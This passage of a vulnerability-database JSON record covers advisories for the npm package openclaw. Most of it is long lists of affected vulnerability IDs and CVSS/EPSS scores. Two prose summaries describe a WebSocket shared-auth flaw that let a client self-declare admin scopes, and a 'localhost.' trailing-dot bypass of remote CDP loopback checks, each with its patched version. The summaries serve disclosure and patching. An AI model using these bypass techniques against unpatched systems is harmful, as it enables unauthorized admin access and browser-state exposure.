CID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerabili
ty":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"ali
ases":["CVE-2026-35635","GHSA-rqp8-q22p-5j9q"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-x9qg-8qk5-s3d6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91226?format=json","vulnerability_id":"VCID-xdr6-tfsy-rqeu","summary":"OpenClaw: WebSocket shared-auth connections could self-declare elevated scopes\n### Summary\n\nA logic flaw in the OpenClaw gateway WebSocket connect path allowed certain device-less shared-token or password-authenticated backend connections to keep client-declared scopes without server-side binding. A shared-authenticated client could present elevated scopes such as `operator.admin` even though those scopes were not tied to a device identity or an explicitly trusted Control UI path.\n\n### Impact\n\nThis crossed the intended authorization boundary and could let a shared-secret-authenticated backend client perform admin-only gateway operations.\n\n### Affected versions\n\n`openclaw` `<= 2026.3.11`\n\n### Patch\n\nFixed in `openclaw` `2026.3.12`. 
The gateway now clears unbound scopes for non-Control-UI shared-auth connections, and regression tests cover the device-less shared-auth path.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-22172","reference_id":"","reference_type":"","scores":[{"value":"0.00021","scoring_system":"epss","scoring_elements":"0.05921","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00021","scoring_system":"epss","scoring_elements":"0.05914","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00021","scoring_system":"epss","scoring_elements":"0.05912","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-22172"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"9.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/5e389d5e7c9233ec91026ab2fea299ebaf3249f6","reference_id":"","reference_type":"","scores":[{"value":"9.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/5e389d5e7c9233ec91026ab2fea299ebaf3249f6"},{"reference_url":"https://github.com/openclaw/openclaw/pull/44306","reference_id":"","reference_type":"","scores":[{"value":"9.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/44306"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.12","reference_id":"","reference_type":"","scores":[{"value":"9.9","scoring_system":"cvssv3.1","scoring_elements"
:"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.12"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rqpp-rjj8-7wv8","reference_id":"","reference_type":"","scores":[{"value":"9.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-20T18:03:44Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rqpp-rjj8-7wv8"},{"reference_url":"https://github.com/advisories/GHSA-rqpp-rjj8-7wv8","reference_id":"GHSA-rqpp-rjj8-7wv8","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-rqpp-rjj8-7wv8"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/112780?format=json","purl":"pkg:npm/openclaw@2026.3.12","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerabi
lity":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerabi
lity":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerabi
lity":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerabi
lity":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerabi
lity":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerabi
lity":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.12"}],"aliases":["CVE-2026-22172","GHSA-rqpp-rjj8-7wv8"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-xdr6-tfsy-rqeu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90049?format=json","vulnerability_id":"VCID-xfgw-ua7r-abbr","summary":"OpenClaw: Trailing-dot localhost CDP hosts could bypass remote loopback protections\n## Summary\n\nBefore OpenClaw 2026.4.2, remote CDP discovery could return a trailing-dot localhost host such as `localhost.` and bypass OpenClaw's loopback-host normalization. That let a non-loopback remote CDP profile pivot the follow-up connection back onto localhost.\n\n## Impact\n\nA hostile discovery response could retarget authenticated browser control toward a localhost-resolving endpoint on the OpenClaw host. This weakened the existing remote-CDP loopback protection and could expose localhost-backed browser state.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `>= 2026.4.2`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `9c22d636697336a6b22b0ae24798d8b8325d7828` — normalize localhost absolute-form CDP hosts before loopback checks\n\n## Release Process Note\n\nThe fix is present on `main` and is staged for OpenClaw `2026.4.2`. 
Publish this advisory after the `2026.4.2` npm release is live.\n\nThanks @smaeljaish771 for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41372","reference_id":"","reference_type":"","scores":[{"value":"0.00042","scoring_system":"epss","scoring_elements":"0.1326","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00042","scoring_system":"epss","scoring_elements":"0.13224","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00042","scoring_system":"epss","scoring_elements":"0.13264","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41372"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/9c22d636697336a6b22b0ae24798d8b8325d7828","reference_id":"","reference_type":"","scores":[{"value":"5.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-28T14:41:19Z/"}],"url":"https://github.com/openclaw/openclaw/commit/9c22d636697336a6b22b0ae24798d8b8325d7828"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-fh32-73r9-rgh5","reference_id":"","reference_type":"","scores":[{"value":"5.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/
AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-28T14:41:19Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-fh32-73r9-rgh5"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41372","reference_id":"","reference_type":"","scores":[{"value":"5.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41372"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-loopback-protection-bypass-via-trailing-dot-localhost-in-cdp-discovery","reference_id":"","reference_type":"","scores":[{"value":"5.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-28T14:41:19Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-loopback-protection-bypass-via-trailing-dot-localhost-in-cdp-discovery"},{"reference_url":"https://github.com/advisories/GHSA-fh32-73r9-rgh5","reference_id":"GHSA-fh32-73r9-rgh5","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advis
